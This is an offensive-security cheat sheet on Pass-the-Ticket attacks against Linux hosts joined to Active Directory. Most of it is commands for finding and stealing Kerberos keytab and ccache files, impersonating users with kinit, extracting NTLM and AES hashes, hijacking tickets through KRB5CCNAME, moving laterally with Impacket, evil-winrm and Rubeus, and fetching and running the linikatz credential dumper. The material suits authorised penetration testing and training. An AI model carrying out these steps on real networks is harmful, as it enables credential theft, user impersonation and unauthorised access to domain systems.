Skip to main content

Pass the Ticket (PtT)

Pass-the-Ticket (PtT) is a post-exploitation technique in which an attacker uses a valid Kerberos ticket (such as a Ticket Granting Ticket, TGT) to authenticate to services without needing the user's password. This method exploits stolen tickets to bypass normal authentication mechanisms in Windows environments.

info

While traditionally a Windows feature, Linux computers can now join Active Directory domains, enabling centralized authentication and management. Tools like sssd, realmd, and Samba make this integration possible.

danger

Linux machines can use Kerberos tickets for authentication without joining Active Directory.

In Linux, Kerberos tickets can be harvested from:

  1. /tmp/ccache – Default ticket cache location.
  2. Environment variables like $KRB5CCNAME.
  3. Keytab files (.keytab) for stored credentials.

Checking if Linux Host is Domain Joined

Using realm

Use the realm command to check if the Linux host is domain joined.

realm list

Processes

If realm is unavailable, check for services like Winbind, SSSD, or LDAP as alternatives.

ps -ef | grep -i "winbind\|sssd"

id Command

If the Linux system is integrated with AD, the GID in the output will indicate the user belongs to the "domain users" group.

id <USER>

nsswitch.conf File

The /etc/nsswitch.conf file configures sources and order for name-service information across various categories.

cat /etc/nsswitch.conf | grep -i "sss\|winbind\|ldap"

system-auth

The system-auth file in Linux, part of PAM (Pluggable Authentication Module), provides a common interface for authentication, included in most service configurations. If the system uses AD via SSSD, inspecting system-auth can confirm domain integration.

cat /etc/pam.d/system-auth  | grep -i "pam_sss.so\|pam_winbind.so\|pam_ldap.so"
# Or
cat /etc/pam.d/system-auth-ac  | grep -i "pam_sss.so\|pam_winbind.so\|pam_ldap.so"

Tickets Harvesting

Keytab Files

find / -name *keytab* -ls 2>/dev/null
crontab -l

If we find kinit being used as cronjob, we can confirm it's using kerberos authentication.

ccache Files

To track down the ccache (credentials cache) file, we can simply check the value of the KRB5CCNAME environment variable.

env | grep -i krb5
# OR
echo $KRB5CCNAME
info

The KRB5CCNAME environment variable specifies the Kerberos credentials cache file location. By default, it’s stored in /tmp/ as krb5cc_<UID>.

Abusing KeyTab Files

# This will read information from the keytab file
klist -k -t FILE.keytab

Using the above command, we determined which user the mentioned keytab file belongs to. Now, we can use it to impersonate the same user with kinit.

klist
# knit is case-sensative
kinit jethalal@REZYDEV.XYZ -k -t jethalal.keytab
klist
info

We can try to list shared folder \\dc01\jethalal for confirmation.

Extracting the secrets from a keytab file

We can try to extract the hashes from the keytab file. For that we can use KeyTabExtract tool.

python3 keytabextract.py FILE.keytab
info

From the extracted hashes:

  • NTLM Hash: Can be used to perform a Pass-the-Hash attack.
  • AES256/AES128 Hash: Can be used to forge tickets with tools like Rubeus or crack the hashes to retrieve the plaintext password.

Abusing Keytab ccache File

danger

Here all we need is read permission on the file.

First we will copy the ccache file and assign the file path to the KRB5CCNAME variable.

klist

# copy the ccache file using cp:
cp /tmp/krb5cc_<UID> .

# change environment variable to new dir
export KRB5CCNAME=/new/path/to/krb5cc_<UID>

klist

Linux Attack Tools with Kerberos

Impacket

# Impacket with proxychains and Kerberos Authentication
proxychains python3 /opt/impacket/build/scripts-3.12/wmiexec.py rezydev.xyz -k

Evil-WinRM

proxychains evil-winrm -i 10.10.10.10 -r rezydev.xyz

Ticket Converter

To convert a ccache file to a kirbi file (or vice versa), you can use impacket-ticketConverter.

For example, to convert a ccache file to a kirbi file:

impacket-ticketConverter krb5cc_<UID> FILE.kirbi

We can use this converted ticket in rubeus like:

rubeus.exe ptt /ticket:C:\FILE.kirbi

Linikatz

Linikatz, developed by Cisco, is a Linux credential exploitation tool similar to Mimikatz for Active Directory integrations. It requires root access to extract credentials, including Kerberos tickets, from implementations like FreeIPA, SSSD, and Samba. Extracted credentials are saved in a "linikatz" folder in formats like ccache and keytabs for further use.

# Wget The Bash Script:
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh

# Change Permissions
chmod +x linikatz.sh

# Execute
./linikatz.sh